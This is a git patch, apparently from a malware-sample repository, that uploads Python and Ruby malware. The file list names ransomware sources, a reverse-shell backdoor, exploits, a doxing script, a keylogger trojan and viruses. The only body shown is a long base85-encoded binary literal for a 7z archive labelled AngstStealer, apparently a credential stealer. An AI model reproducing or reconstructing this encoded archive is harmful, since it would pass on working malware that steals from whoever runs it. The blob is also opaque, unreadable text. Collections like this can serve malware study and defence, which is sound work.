From 9cbdb38457a8a1e419e0036ad8798e7a2363ed00 Mon Sep 17 00:00:00 2001 From: vxunderground <57078196+vxunderground@users.noreply.github.com> Date: Fri, 9 Oct 2020 22:09:52 -0500 Subject: [PATCH] Add files via upload --- Python/AngstStealer.7z | Bin 0 -> 41861 bytes Python/Aris.7z | Bin 0 -> 3745 bytes Python/Backdoor.Python.RShell | 121 ++++++ Python/CryPy_Source.py | 463 +++++++++++++++++++++ Python/Doxing-Script-Py3.py | 336 +++++++++++++++ Python/Exploit.Python.Ms06-036.a | 237 +++++++++++ Python/Exploit.Python.PunBB.a | 130 ++++++ Python/Kirk_ransomware.py | 208 ++++++++++ Python/RedKeeper-ransomware_source.py | 220 ++++++++++ Python/Scrypt.7z | Bin 0 -> 9401 bytes Python/Sin.7z | Bin 0 -> 4397 bytes Python/Virus.Python.Agent.c | 98 +++++ Python/xenotix.py | 210 ++++++++++ Ruby/Constructor.Ruby.Qtp.a | 61 +++ Ruby/Trojan-Spy.Ruby.Kakkeys.d | 574 ++++++++++++++++++++++++++ Ruby/Virus.Ruby.Badbunny.a | 314 ++++++++++++++ Ruby/Virus.Ruby.Pydoxon.b | 26 ++ 17 files changed, 2998 insertions(+) create mode 100644 Python/AngstStealer.7z create mode 100644 Python/Aris.7z create mode 100644 Python/Backdoor.Python.RShell create mode 100644 Python/CryPy_Source.py create mode 100644 Python/Doxing-Script-Py3.py create mode 100644 Python/Exploit.Python.Ms06-036.a create mode 100644 Python/Exploit.Python.PunBB.a create mode 100644 Python/Kirk_ransomware.py create mode 100644 Python/RedKeeper-ransomware_source.py create mode 100644 Python/Scrypt.7z create mode 100644 Python/Sin.7z create mode 100644 Python/Virus.Python.Agent.c create mode 100644 Python/xenotix.py create mode 100644 Ruby/Constructor.Ruby.Qtp.a create mode 100644 Ruby/Trojan-Spy.Ruby.Kakkeys.d create mode 100644 Ruby/Virus.Ruby.Badbunny.a create mode 100644 Ruby/Virus.Ruby.Pydoxon.b diff --git a/Python/AngstStealer.7z b/Python/AngstStealer.7z new file mode 100644 index 0000000000000000000000000000000000000000..a03f5e35c321c3ac5b99ffe4132005d00536fbd0 GIT binary patch literal 41861 zcmV(wKv>5NdYfR zOV5E~82IV-&M%Zp|4oZbv)2DFsROy@>|mg%RjNGn(Gp~p;Z_hH6vt44X>w%&?Ktzq z0LtcdLOZA1u$+)pNkL`WSws1cOJ3!U=$HMco^bpxb1AT z10=9t!fOVnu*e+l%09A^VR0uYp_IQ*5@I~0N}EMjY?jDPG{#QhuD3@;=it6t62}}Y zbQ?s4PO4Gv4oBOGY9$HWBw2zJR7I(2h>-}=<%G4o?G0>${S-0Dyn1%ei)KAU7rt+N z4%=yv3w4)r3kp3GhF0m#$+%|Xx7X>B2}aDABOFS(UBV6~^^hd-?8uu^hEJ9mQWCga z=P83OFUpR;g-5#1mmRO?U=>hR*lfWJC%ISCEBq?UUqW}P@wQ!cgqE`A9k3Am%REFX z*>ko*<|x@?Le8H~jc1eb_W_<0j8uD~b8j=Sn3;HWu>FPom!@wx1FEpJrD3>Vj3XrD z&K0}$zNUb)qyo#@de^LG)2FccaU)2*>$G0Q{!M-6?F$5&bW@{-E(JGoN+&iE^7R-D zf-tqF?8pf+DZvmalKpS1@S_>cb}T|p`TI21vYbA>hd4t zME2*$(((U`O^+%mpzuQZ*FZj>-#lPaLx$|5V$(`~1OodT#}h2sFX~V#Yw-0WfP;RD z8y`EQV)eZ7+{y-(g)KpW*DA|YT8lfsEXP%A_|G)}YvQpKnB8A#dA3ok<3g{7Ask}N zC!uO@>oQ|7-{Z^|=6020G1#OSglROYiN1s^^a=gh^O9VZoH-l-Y}$Y(<6|7M+N)mm zKd0v;Y?+1sJA?AN@V-$I^V#@x&B4_Fa25aX%y?3H2hiSkg{=7MX$v3a`J?E!k!iNWyC5&_J4f=$MX-4iE`d*$FXM66lNZNlTq@-W9ll%W8)z?GXsxFQ&lvQOGxi}G1%o&uC`^oi2 z8(fN_Rs3x>uW@Lsl4?CQU(1};g&e!S_pDT*;E7Ntyz23C3nL#3;FX1w-qYE5Q%*|z zK2B?WkKawrXi0HZl8^;%qV3>}oz}0k5~$A_lj<}~Chp2hGa}Nht5EK+6dK)LDs2h; zL$+00qU=l}iBDo*RZTV%L;si!a~;D0Yd&%1oAcoQb=8ve*awN#w)h=J7kzg6!{JY6 z?u06!df{=px<+wy{x($@R}NJH1N|qtRp~--M331U-a9nL}w=Yx2tb%?f_%?Sh?vOK^N1^(~C60exj|?k5LiQD~kk+upKB;YM zqqJ$l#%1++P07N6ANykBhI03YT!+6U)UtVkDji z`K1R(9*kR-xSG^@`ij_}Lh{IS-kO`{;|Kgz3q+6lKCdA6Zy5jWdzP%^wOcuiq7kkv^SjsrCGlJ1*?T<*R~!dUkaXaXnPuut;iU1NVCliH8+2d8Y3dd( z;NG(cuI0m0K{P)*{b5kS6w!Cvp2r{wpS2dX*eBX0(i(wJ-ekq0UtJo$)0>? z^wX{VugcyI;JSBj8?Y3RhHB?yS(#Lt7n9dwfK|#$NQW5~F|_>tLv|gxEg~Q`?*NxI zNo9`|I1R)RdYPo&sz<$w|0X(y*afAKxCERK1~0!)rp{8#6Yqt{#Rfjd(*E5IQvQS? zjH8cb7E9-g`4Ak@!9K4jpG27sid{a2SADUDZ`ES+J;oU<-_9f*ylq+R(#jAXaI%#% zXKld|NgFQd?F9vdV$ws~C6|9NrB6yU$;z^`l%}d*r5Zkce_5_|bNJCqxR(kmUX$iL zY-v83Oqu*$)lNI5x_v0}#ZNg zP8gE#3(C|q6{p+iO_XX1*{4#!zAHdL^*{Y>NV-yYM$D!>zjSzQzgakZzDp){Q-#h- zGVJi{O^8Fh581>hVK)pS-kg~b7|neKMs+L271_O^ndByZz14ln(z$VAY`%NUf95+W zdQs?n=gx;t4fk(Wn1Py#^GZ0Mz2$t?X4mGil%Xr2639Z1E0ho8(`UbF8K**qq4I!NnT%^0_o)fc(Hec1g46NW|kNd|K&f{?I_o^>l& z1#bGhEcKlNqTn9>m#Wp@r4WZBYv$HFF$`Nh=X8%y4vAu&P}>kH;qcbL4ZSdK#Z>|$ zgz?__4;3rIjBix<>_TvFMV!zaCE;MrtOeeg8#pvcP4;qsbHW zJH2Fr7tyF8(Iz$O3dzAS=CUaW|D_d4OfkEO=1sUcxYD8=FkxS|gLEX$D0M!@{T`bW z^2D(sgzxH^W69#~dpM`Q>9b;?Q>{*!p=__>wo%e2e78c+w&T@5<9j19rPcvO!+y~( zxj%e=AOucy*1I;*gNe#Yo|vyc3o*nC*rJ;5eDu+F%#dpV)F$D8n-lz~{*#Y2|MUJ& z02#Skr{LsPz>)Ls3UV>P0Azr_GU^(%2cZnJX6;tEo^olpi*Z(c%meBdy{WF#HMevm z@F=j&W?CZqd`XPav{JSJ*$-1#sWt*f^KE~$Jqt4uc&k{-KRp!7dyD#ZdjU4*BF6*h+4QLzM_1r}%U?YVEvibh}T!7r?%&KD^R|Nr6 za<*iAFc={LqTin)fX3?OkXT9qrJT8Qj4SNQ_JIUP2Fn*vGhxzAqy@yD;2<1vpH+c^ zPbj^L*G1tovVrO5uiJy=rutD-Ihw!ez9trqljtHQ>H1TORQ+4UgJw*sJgSbml^eXK zQf$iuHTeRjvZv>B9MW`t_!Zv|g5^k^m;}Y`#uVARd|2pxJWGhHh^T>@VmO7uoCvn% z+07U;>dGA0N}uHxH;zrWICLDz#Q9bI?|iJY8QSb7Fkw3hK$3pdNV*o>uIG1-k9q`h z4i05BeS6v=4y`AFo?RFUbN%~GlBnmEKe%Wl0Z_?0IXeu<@H3|2bc6%FvR}2mR1WJC ze&E`oO&u&3pf(5=-G8jhT1?8=7ex zdVCPni$}ACEQJGt9fAV?@y_PFq3Ii7>GII+vnZU1w@KaETbw?X)f*w`#@tC+yVcrJ zun&ASx`?+wgjo%No%TrHesdXdE^VYUI z3^|Y6rfm&SiuxWtKFd`8Oc$~1V(%&LH1@g*TbSe^)A<$GY8nt+>Bnp^>nMSeMG(XM>FiI<62jKir#!)i+WT`vl z%3U29u7B4OUksfRRewKbQQZaKz8#H|^cD7{nA%9er|%60=N4!lNDV0pmG=DxtBh_x zrlveSNf=X}U6&}LJ+ida*x^w@+jjzdB2Z2(UvY{@xf17^hffNPmRf9yu(6F zUqdBiG&TP_R*UW!54`KatW) zN+gt&07Jca5Qj$OwMrb1d1|2Qpo+)}(+FD^Lq!04=)CuCTPviV z8a*~HwuVYq!(6Ytj}zJbCVJ6C_HT24&1UOCKAu8c6s5!24ONNQhbn3>c}IbD&&TD| zX>qHb^}WM`COeC4W%ql}E-$5F*Gyd6*H+@RO9F0!GyaV_-yS}7a&cKbo}2^S?4R-_ z;>`?;{BMfB6NM(?8FGZwR3kDo9D6IQfy*rV2un%voWf73e|Df=3;|`cL072C>AYK4 znspKXJ*ds>7#|xE@26e@^6?W}=J)5Kg=3B|?Hg_W6UR;S(??kDU$bzxIH2eyGuy(w z?E&B}NDvcP)Y#k$QY8CRQNqm1!Fm1D3`VL+%SE3QPUj+IfyHV+S1P(8eC}Cuv~@$# zjJP?M_~g`Oe9BWN+HgZd!Ecp6?GK>&Hw|zCeguhlD0#6$Ka3f3iWJKxpnw>b3c#;@ z_pn;(}1h-a+blQmc3BbCOKGE$(};~JjV%PP*4nJ^;~lkbr0}_yUknd=T+65 zdM&6e7kYtp1Pt_rJnzIUr{UQn{F2J*De`t|yO<~5$#hzQVi28I-)eo^WBs+wYv{#= zR8^>a`{=)p9!?UsdfGN9*EZ-+7^qtMerUOaF{liejbs`%E}^F0Y;|M2{P_>61Edf# zo%>XHUJ=}eofZ|mai9U}z$$*;jn>*j5pXqKK*R(y(c=57W-D3X%W!M}>m^pyo?kQo zjKuDzG0fyfQom60v3cXD0rBo4=YgZCHTEr~G9_a6lA++zL%iiBKw%;WN@(!mCB}oMX+lq%-bA9(@}bxujgta(m>%&=A+fyVxgQ0C zii9ISp~7xsS_LXm(n7S0$FFzio(PzMO@%um8P_@M=I2`okbKNaYRaRYb$q+I9I-z@ zD9hMbk2Mizq}amUoo`R2CUT=!T1w^PDmz=yP8%6EBfFk^U)b;4!R8r#f89TgPw%I{ z8Ape~9W0xzuz#yY6*?E>OmUFBUx>x+?}u4yBR5&3E(xbFEZotyPSGI~`~^AMPTKm6B0^I2@o1z5um>lP3M90)Kw07>XlZdXGlSCVA<}Y)xrTO0& zL^bEdB(?^DiOYM%c|gnlz&Oi0M1fg>t1d%7r~{Bxm&ko=!rvMZ>HDfN4~}rG{<@ye z?Nfx}z#?+=3kmI-p;S$i0cZ`A)Z_-uw|Z$txdrjdKZgvZ4J90B{PTy3s_Ey>dYFx} z`K(0HKZD)oCrREiqvN~e2CEFP#ofP43>*3lrYAzoRyfrP>Ou-IK6eTRdx$6zl&Ji> z)6#2>JtR5oPOH;<6`%F~;WVI&8$+Ne<5tq=fK%GcS&cric+}k@Ii^K|Fqr7)u-jNd zmb7)^{bO-_%3F5rpG=@#&GkT!Olfb;E{%4F9QaCbEm3h%gvMA~RmRK^aH&JIhK3AM;l zfJg96Lg%zoSf74*Jr4iVk=f$>H@z|<`Q|v1%hJT+j3$&n+t7u0>ZDDVGOD%} z+8hcKN9|yCl8b+odq#W>0qF6bCvO0P!$n@H@|98o?FV|0e?0!P+EbM|H?aVBTEHo# z0ao3hv+>x1GRz7xkq`- z&6+XCIQ1*N$%h}@-@aAC)Rhon1l)CiacknU_l_T<5Z#O$?T{=dS!S3^cx}vP9)wJT z8*u)bn9y<1YsBH3b`2$tAV3H{1{Wnz8YN0eG+`p7F?hwS`dK(yY{JTzZE3s{BM_Ay zq&Cc;pWA>-Q9`tM6@D6=c?;UL$;-@_9su@4Xj}u=&)adFBpeS-dt>G z5S_@(E1v@V!l6hdbx&Cj$I*}PzQZ48#HW5|Jid*SdbtEw@ zxuZtHN!&)tj9<$prIdVEYi?p3{vw13ETYoY_zo>Pvgf>vN+QSZPP-(w*w6UoP_-G_ zD z;SpjyHjBT}f>c5-^IthwC(kCXSSaxgi$>K+V%G^K$aK&mdXW9j-Ius@TP4P*e^s8& zJ#1lXtaGyHR(c%Vy3dM{S|>Np^Y}0`JhayQ8JjMs3G8wym_DChIXU6-?=Z_P++n^H zzR^+3kxtTm>d;kJv`eNme%h9B+nDr4;BBEL*qW=6g%*K*5){|#>b-Qh9>HWd!n(kE z&Bp;Z%Z*|K4G3~MjntIeD7vDZ$YLUb%hGaLAzHv=-xPH9A+=tHsw>ICijNb#xsyd1 zY5#bD87r;uY{2SyD?o2AJ3C(fqB)JP_H84|6B?I7MjGmo=bPxIBOkWCW9oB+OcJg5 z#jbe$MXP!zsrxZs@AvcNal4dG&GQ^HK%FOw{TJ zeNbX|(EY!NJGWVck3mmDnh?E>52Y}3Eb2zNZ+m8!?0i}U-|IyB|Fizq|>#W*7gK}&=CXF>Qr zmHUjCzR$&bxo@sCwAB zTBWcDe;c*#E7PV4bwJi(3}V1~ob?`jbs`S?uE6)KV8$S<7zYGY)%>W389|vEazKyw zAM$$G>up@}*=BeSXQwtI&pVN`cWnq@vFMRM5^4A)41E9PMb6OPXc!ur>Oc8!j8;D<5{``t@6!`a+}M!AB8_0Lk(G;-(Vq{ljRA%IF8u?T@~U&ZI#$PLaP zvZ2);;Q$pHK*=R5*Iz@(euBv=IB1kUQZi%x7V*S~$}s4rkie*O=)IvkP3eOX7@4)p zrL4KkJxcx96%f~cULYh{6gr#o(|p4?S>*Hto!~+qXh}~L^cY^twLN^JX94uvL1=_P zqtFu4@t7fqQdMHn(lePT`dIqm#cEu*l{_<+<7KT^v9WcN9`}(QeGdK)$(y)>g-?}b ziRIE;FcGKvfC-QV6QIeh;4qR!6gnjWXF7>a4(all)d>7d(e zArMv!Etky;TN3RTCuG~O+QNFh2c|xKPgnb#@~D>{{U74)3CdWt(!k+i_1(06dw8pz zz0dQ2tM|dW8f`pLgC)9`ZCYCgXP{_G>>I{CZ~#Zz!RZ7=WYw64;V1D9Yx^o%rBb!D z&Uey8CD%CLfy2*SZ)J;;AY)zWCy2hvfZ?vUnG#@3{?y!uCPue!jfJlkYhy&6R3amv zDr$WLisYW?KW5)Hc?0r_aO+?&S}dVt`MVXF08DtT;>XLCe{4^`?ov~!RTTkc;OYkT zatDoICt)8eT$JeQZSJC(zAJJc4oZ(&_KP+uSlG-H6`h6JcinG2u`}hly@X#)Za1bR z3H?45CHLRqz>U4MX6$^1<+TcNf~>NIP(T*wJzJKjzavv&LHeFUDFSMc2Y{NplCtgr z?!!Qaj-Iie5q6`}R?qZge%Dg+5NtbWx)?|UBNCHwr*3A*4p*3WpCF+1!mWOMW?J+i z|DXkFr$I=UwTN&0bh|BzmdiD}mKad}5Vl0gn9Ypd{TbtS>p<&0QU67ju z(sGzgLsWBmFKxg9J+Ua-lmnnH-2+n~oOdfN?AMs{Q@2wPHm|@RdoQtxD9`hKqI!ih z26c>NKa1v&XqX6-aaR(+qcPJY_#sOSr&qqvDzbujUF{f(j|0<;>4PyTs-kqFS>Du6a1I%b!BoR6Yb}Ux$9KZ&(%JQ{X>Z z$?UTZl+eknsc+sA$a4N8jX1P}Dn>x~Wz0bS_eWDiiqlOgX8o%_Yd^x?{yA z&*&>PEv*I0j>$Nw=X`ig{K#F$^q0X>$bJ6%!1Y=>CNeX;1XYt`L*>Rp-gM!7Hs)VF z^w3R7DZ=x1=t|*$vW~#(9WMjv=p@)B7?SK9(Ae@oU5LT~cP>%sGVut9tX|Q_ea;pT zd$X}adXl#F3!~g1OnK@iD(xy4`*i;;-RWKZf&d)AqZ>_BB$hN-YqI*UmEvPzxf>Coy9Gh=8?y*YVDtJi?vS@FG`K@=L&pKedE>=*rJL zrjKcS*^HMTs{z#`}BmUt&E@f9+YPj5(4l^JrzIyE*i zwVT>KJF6kg4HwYz`X<)(8W2WTcMnF_0dZybTe593+lB?VknvXys+>}!8Za=COTX>gT` zAq7vUTO^&&e6S`D=mBeG%)3c=VoEvIe{DDJ?Y0bJ`H`a$FP#a;^O&UXNcw)sdOQb1 zf~ZGGy8KcpGYK*G`<}!=ZzDLwFuE#!9*3R4!q!5x^jz4z6h7bu?($2r`6{EN-v=AL zXwz@uF9(iPm)7tLN);J zmrWnzKZdc}Rgj|94S0i^oi9xMWwpF;36R)RcaRGN#CrsjCQCY6hIsg8nRJ4HuD9yglw{%fNpSR7zNJ}SetS@ffF>jH_UsDkC(lMRpb; zf~9C$DRjd4?B^7evdvjUR z@Vs|Ud+7ry`67_GR)+|0^U&6$oruW(l*Ci;G1vtqpNb*T5biU+OH6s!=ie>iTF8hL zS=013Ch0_=x~APcEreQxfH)ke zk@Kacd+T^B_P7-$6KcjYwbh_Y?{hP@C8;qH10WqFvHjBhM74$@*mav%=; z;4I^nw7!)+1pd5c<@w|ZhtcA28 z&0Kr&r6Op5tS^beH{sFMTA{GO`msLxnnNsgv?yI4s0+_|gaymu)TI`+kXLcUinnXv za1aF`fNuFo+DS=~$BsmY7JDqu;#$U!DN2scjcwkDFZHe-$0n6rPc;wqmp-~L&^;T8I8;&G8uUa*Wpy7Y>w799==}bgme{I zgU+`+z3~%n+u$_?HoSQq@~U$os%$wu@WV^N%);0%JstDyW&oXi5x}NNQq$6GUUwC_ ztnt-z-;A85c<;i}u(M7x9t=yB2U(9ei#q40h=l+vb#BX%vq*rEI7 zMUO9pw_^6*ikEEFC1yb2#iO$r1r$#t|+*^r8{-`DUHVe{dgKY*@R|)@K;vH zqt&$@-syw_SlV6Ic+wt#RPX*h2I&AhBd6KtEoM4hQJ(yOGuF8Xd(+1UlCh zz#)X?MGTUY1RB3hfPiDR0PJiKF`k7tXWUH7Z^1HP5J@odH&jY0ic7mk55jUsK>dkI zL;Q^W))^&t%3dprLjq+dNR$lI_)JSm1D$7I-R&xYs3CZI&6bk=Ssh_B?AdY&`o&~I z)96`9GiY?;@BJE=lj}ooePWTTZ4Wi5gHW!qcUp&^m#o? zR-#W+rRkmuD&%AOj|t@q!z6 zLV+Dd(xVj=7W@@>LNM)|RdmQtQ!J}gfvcSvu>aj1?xni6$nPMApaHj7Rg>#qs_c(^ z+J_MpLuMMegICYPAVTN*ZC81Ub=2z#MrX;nK zAw8#O%&wWN!Tk@#mn}5R!HV@^A3X@WZqw6u=)1c9)a|Vd>g|MZ@b)bJ<`GdINtyp5 zUMnE08qz)DvrxVASCoBh?5$tcvyaX9#7Bc4mFp~HD_2x(g_)l(abXZ@zksA9b9NO3 z0_YG@<+Kc;(nDP%4P`GGCZ+5%IplnbOJ+tvA0jtB>E-%q32KpFIp6&){&IN1nQDCx z7!gC%xa%aPT&k*%efHLmOZD2`n%Q|fIvGJh?R5BnC2tjf7C5fegHPz7fwP!}dt}4Y9$HId< z7k`7FJEm=IvGKi7StWHXZR|YXS#3W5kLse!AT>j3S6EtGzStO>7!3!PAE#lGm=vf) zpD_!!>MH46&|}SJHY>@t8P3-r1^WxVR3NsUSWWn6>lkom+VYVHiHn{(HX>A|^xHv1 zpO<{2$2!@lUyK3#G@!o>E^gy3tmus-QX6@A-ev#^8iRUAO%wO(L3D_B3LOv`y)SS<=|={=jsJJO;R<1jg)ml4a1-Z`|NI{1dm92`9PYUta$=zq58@^RkrSbvotl%@XF z#c<6<(pj4yd`9P-k`@<;-S-)k4_DQ?t2PHixS*(8FD{t=TEJ*#?LIsb-Ut-AZL>G* zf7{wbVf5Fn(w%65%K>w-_rtagvNkPxPBi+{cVsDqW;Xp!tL}r>Orbtoyne`Gjmk=L z0Rb6XY2i1Q)GEqYn?G7Xf`>WJ6zRmq5+18twpXw`Ua3411Se?_OPVo3XPv``66J8V zY_w0gI&)*LtWs%lNV>eK_pZ*&th2!eJ5+Z(QJ&uYL60O`(ScQX>g;Ub_dLdVU2$aoJr=-HO1b#cTu;*V_>d{rn4PaOpXbArY9PguHFuJ$gxY2Mm0|ADfP5}PU1>n?wK zB|S-IT>N;n#>K-taHX#G6l13|^E~$#QmyF<>0(b%t*>@orRxg;;C{;8oGMxn^~Qy) zvnL%CbMzU{B188Sn#pq0fBBRSNf5;2blM}tmj9+_%^lfi0$u!&J&VU1+{PRzPmA~N z^zo8p538F7i9i%rhGN+HO|}M7_>Q&AaB~{@R>-hO=#nS8!4M*Fw`80(3t~*sq~$%& zhgyij!y({cE|1 z49?p@88!uXqiK`_xoFc>7DkQCvZ8ezYF-OITYn6XCvtj_>9S-L^qeu$Z8q7K-=}RV zTMyby)h}q*<@pa}H(R%ebP}<)km&ej)yPn8CALf zB>N~xe=cRLW(C#e^r_{EGRf|jE%#x6&Of+kN{VEwj`>I z>Gc1|*qcB&RI1b6f($SI9=2tZr-P>e0bG|wjbw^hrkv}{_o|0 z#EnE?^au|ga1?zP!PIcuy^nqXg{+qL5N% zKV&ek5MmGfF*&D%Y8v%nVVBJTfcgY z_6@_Is^7fYb{u(A*9;b?w>p#pb%Ov+OhTk~3WLh2oR-7PW(WA4daRO0f#kB1J%ezF z6yy7g@1{(qyixI#<%0->i57Nh1e%y==*Or4h zd`tI7JH#`ZY`wy0sZ|x)-M%NapeO(l-_m&(eI-fG6ZsOlE7CVOaL{H)X=4<_|BR6d zuZ#mh3c>i#LM-Jlhp)v@#;?|(Gn1d+FxFJ8X4VuB89BBeoM=s?);32L0w4307;@wR zE#7^D<51rHV{IK*jyx~ZCRtMT^cRqy-xT!=&KU_jupVQBV{TKem54zrWT6f}>V5)qL zYwie4Fn%eY?z@LM(*)H9pwt2P0F_oSFyG-$bHbLCPy@oFJ-5%YIdb$JcV4t*>-Zd- zs!6{*J!XF4H)=Ga^oz{Lip?+HoLu{p?gH{At+P80#!yd@Y4|8U{9hlsPgu(qhew%*CX@w%Z%ofWAKYI*>^9?o_mI8dwa|&n z0FP}ZEO*#U5h-I)H=rd5E&(@*%_v0Fx!*KBIW)s;qNi zbD3l)*1scx3TyS1)kV{rbX^+z93W|uPfFxcrmK8~uc-G1>_B+Ruj?{r=U;C8{#{do zQLe1tEMW@H&qff8FwnA-36Sz+$u#wBu@ayUlgi+)NdYci*1_^wky5-q{!pBvN?$I`oTb;u6e_h9>F2hKd%AFyHk2IK8`0z5jM(-76tZB@aDDC4nnB7=KRQ5LTnF+DttuvRwfat{e?pj zvr?wml^@kBXz^{&;F!U5C*4pIFPuGjafvztBnm!@-6wjP66*V^5b^9p{C)DFg%|V8nJlowM;ChDwJFSo_cyu;eHl52 z@{f|S+?^Wj9cL;_^+&mpn(D%@7Xz#htc=3e_a2C0mCh1@(i-}=!*TVaZYUFgW>j}c5govGh+ktW^Y$mLHJVwMAv>O;Z+D2jk|4B|#PjQcnn_`ive7MT&cC|ogiKg#&}Fg6UeExr?IxdtV8Gju;Tq@3N& zTl8eEOL~E^oKl6YRl}`8w7toqcaIwg=PXXHt%qDk-JOr2aB>#eut3a?chx z->7{N$5FqR0a{wQ#wC25Lo3`Sehyx*lzDz~+9=7Qil^^0P_Nc_|EfU)#WBJL$0Nd4 z{fMb-M#7828L(_`p1RH1ru!GLLq$*1&P5=klwQ7E*5kE-(vm`|Z8W6vs(x2A-R>%+ z49}_-ROM8nUA*cL@JO1lh3}6uhJjl*4a;-loGbirk760Qu>#wLfK~`YIE(q5)+&0% zzbA6%d4%I2uJB)hUEN_W4ZKXhI$^XTD0_4o2l2t-)@xz`nbRG?J_qeD@^{N!Q+VsraZ1mdE z=S7Mcxn6_a=JiTE8nWvHo7feD4f0yy@ zkIL01W=-E0OkoS2hIfN_t~u#fovfd8(wODqHptsrqp8`|M8xH!pVfx0C*SeJ2kdoB z_;dZ^!bu?>Q2IU(C3?Em8IwktlU}!rwGsPWm-xQ#IfZSAC1=(2FfJo72*b@zY4(Dk zB=d>+YA*5nk*?5=jIVoi@7m_)5>dIAI1>Y@l?Lu_5Qz_vq2Jfvc`w}yTP_RhPfSSm zaWPf?tcSjpZKDg83_a<`g)Clqp6+K+(nrFL6$b)^44ymM`+Qr-{1tb-RabzMml_wI zX3VbDk5VpH0=cjA`|c14T&^99BaOZ3`*QD;G!bW<<6+2nfisNuI&4ofT|4fA{*&Go zayc?56;HGHUQjXcLzCv(YTg? z0@k6@@7aWQjlo3Eu=wZSMR4X?CmFl21yHf9wM6a{x22OS)BW6%h0l2E0ZTppAKf!_ z$=XSzBNp zR`!_M%>1#TmMek#w9B9lFb+zZ|a2_UL(rpCXvNVa-n*uKT6!ofd?6#Fr^K zp|tS7+$E*?Bf4kheR=N$$=9MTx4W{i)>hp9^$2rqPEOi=VAg{H-kI9;0d64Padyv7 zNU^p>8u4orV25c=J0RRbr9)Z+!;gvB*9DFvT-|_3xbU8R#l5*RYlsr_kl4&FCDy|7 zFWtIZ6y{+H-gn|9;&h{FC<=c`-zGvS_a*>1vCZdbaXK}w7(!Dm?!Y$kb?wwhkg1kG zMLX=tO#!zfv2eIFjv02U)bE=prKz;MiRm8A+o+xFhwH?ZagS+`R_ zvx`VbCQ1>f;@skjT)-Z4n?}*VP`i|b_Qh%{6wbii)uwi&7IfrIn zV(PwJf}f(GF;i zB|$KM0U4xWUsUYIzgy~H9q=7)=waAt2*)j_H_ZZ)8m;ap`nTfr=tQT3G*P^Ly z&0LD-gf*IpdO31={mXvTZ<~1``Jw(hhGp_%Ul_t6+E#4foHlgt{*&@PIuhf*!AF`- z6Mc%4AMXvTDBs%qAt+=(%_Ws(uDfbLVTNB3_TVQM+!P{mS}B+v1(-;2$Md~k*PEo= zEC+j(E^6vE^a)z^u`qofb1m@1apmguU;CT6#%!p~+bn&E`L`UnJ!U`keHj=;Q<+|X zif(q1T-KT~sL^MUbURAM3IdZJBPN&)yap8nVtz%{`(G+QDdDb{)gkK_7J=O=4IcYJ zxm*SXF%`##zci;G2J}PTzvWN@1)0!L%Max)ZU}cACYkH}KU^K*@oh@BE1U26vc+29 z!=@`D1E7{BPOl|XCNF>53$;%7P$gF-UeIZnXi0#aQfN(7bJ6U6nLat4NS06zb2+L+PAwWZS)jI9F(OEGDf`2mB5x4a$TSy1$F=k`8e+|AJkMdBVgY zRdwNq!KAdeGog)rnj@=|Yi3;gFp^$1;5@L9C+i*3Eh3g8j@{mI+BYfOJ1^J6{~nCR zjUou;0q`1J4pn!nYV6#kC_U1Lvjt6$6!C4k08%B!Zg)b}ea+i?Zf2tpGGs4)UNX<* z3odM_CZ|#}l;?Z;x`k11;m$0M(V7m&f9UtU4vfTqPe1>WqLS!D5kssRpSX4%6vQyk ztZc2Dgd#?PG$yS__}w~;9qZ}-Klz_8Ct2iW`!v_@-Q4pbKP=>HzIrYZD?xo>3sd3K zT&9XbJ1ZnV=euHwAtW)1k=CME$BEBZ=4T4MRQ26LJP2_CrR$RGb*f^L@eR4tcwJ2> zh|HjYSfsiJ7pywBCstT3p@QdU|5pU{^&0dOg(^qRHPdIHJ4?_S_4yQX^c3pbimqQ5$b*_6Wsp|EmUe|Zk1_4hbR+d8W4NFT7;YDb`&)su zqaw3~S3__DWC;NVbhU*H()D*Up1b;YK`4IFsX|+U${%p;ZlS|`(L>*`MSGzhX7`L4 zq+!`8fO)&l+Rr*bK~la%DO715`)sr zZ#)4E?d8C4!f9hSbIv|b9ioTCFRXw?Nlhh*&<-17Z-t0RDAaEa5Ka(ucyM_%9JDI6 zv-$D;OUkfTqP$WjuYo9gBAKbO1U|*1OS`^~>oS@njhfKW5VhY|>42ko>&uC4)-;$m zTuAhVgkHi;qUZtkbBxhS<)QnBX}g7!MRR|2rECT#)(50iiy4vPIu_9LOMw8cArXT` zCzIZ2&=C2V1=+{H^U)om}1VLXk3}% zi;I*tE*EI^k<=O!I992(avzR{t&GcHIIIWARTR+a1cu&_bYd!=OP$Y0bDCa$ENQ1#sO3pqWD(%|SLRdF7G*g%KX$V%LUy*xSp z^rP?$Yr*59M7z<}3@uHV8A4P`VNUDT!0OnZ(Vul0h~YKE1`l5f4N1WLKZ#qT);V)- z%U4x#H1XN>XkZg2Prp~8;uygK_$X~1fL;+=AbUW%XWGuk=*$WFT zvgf34Rk;{_#E(r`#c*3mKX3^DY#tnnUyvNsTwBbFG3u8m???)Llj}rw)gwe93kocP zRS8?A=y-;u&~vd~yeS|I3kIi12B=mR7lgz|gC5JAd}>dpVhe&MA}b_Z;ryG4z^IE; z!ma|n1VYOD!h>*g!`XNNKT^wCqiF@q?h}QUSbN1GDo{FFm|^Y?7`JkpE_9S$iYGI$ zQGMO0=>R6>GBrUNDfmmch1-pJx*H6+s^sA#>n=sms^rPkBW&sDhSpHT4ZqS6-}5f_ z&-6tnU^6PLVp-@5>p!cKyLEC|xJ%`KziI)li4^68O&dKy>2Ik+k97`bo%p( z8owO0C;HyA;0D3htiSh)CWXo-l7@Y zoYwkj&P;`iYwOv|sxmVTnx4zA@_#jpWyLi49c9T?e2@rB21IuRE#xv&BtG>X>&Yr3 z#Af$kpL9Zl*%`ET#thV5357=(mM1x#ADsFPg#fq$Z#HV^d-?OisOFccb3+8c?jAUU zssz9+F%6-aytIZ0EX%sYRUH9AhnTSsf1Qnn5iK57{4O{a7Lvl*j}@wQ(IhXgW??k@ zhOKh9rQ6v#V`l;*e09Yd<43l!yMu##7`c2LIZeiT7V4)xz;yM-_zQdHh*o&@j+j+I zK}+v-PHfDWC1-7jSc+=pp{GJ?jdXs^`jMYZUY$?QhlH(~^Iw}Ha_^2b8}ArXeg7do zGC-l37_2CGQrfT!t6hX|G5;%Pdq3aD6AjGM*aN%DJCz-{#aGJYQA!+9Uk-qEXyqIl zP+!DbD(a6}?fK2JKQ?B(a}#MQPwdTF*Ye#aGLCegsZ>AA%wv*86co}M-O+|)7ki_Y z8zvwUwidnwiLac=>C^gOM4a^ojscJ-Ku?PNp7G%9ygdotha=}X*Hw=X6Uk%R z%;RP1i;d$CJG)ALnt$NPxGEXlf{I)!JKXY(XhK$Uu0pN5+_18Xw-l2nG{BBDk)<%L 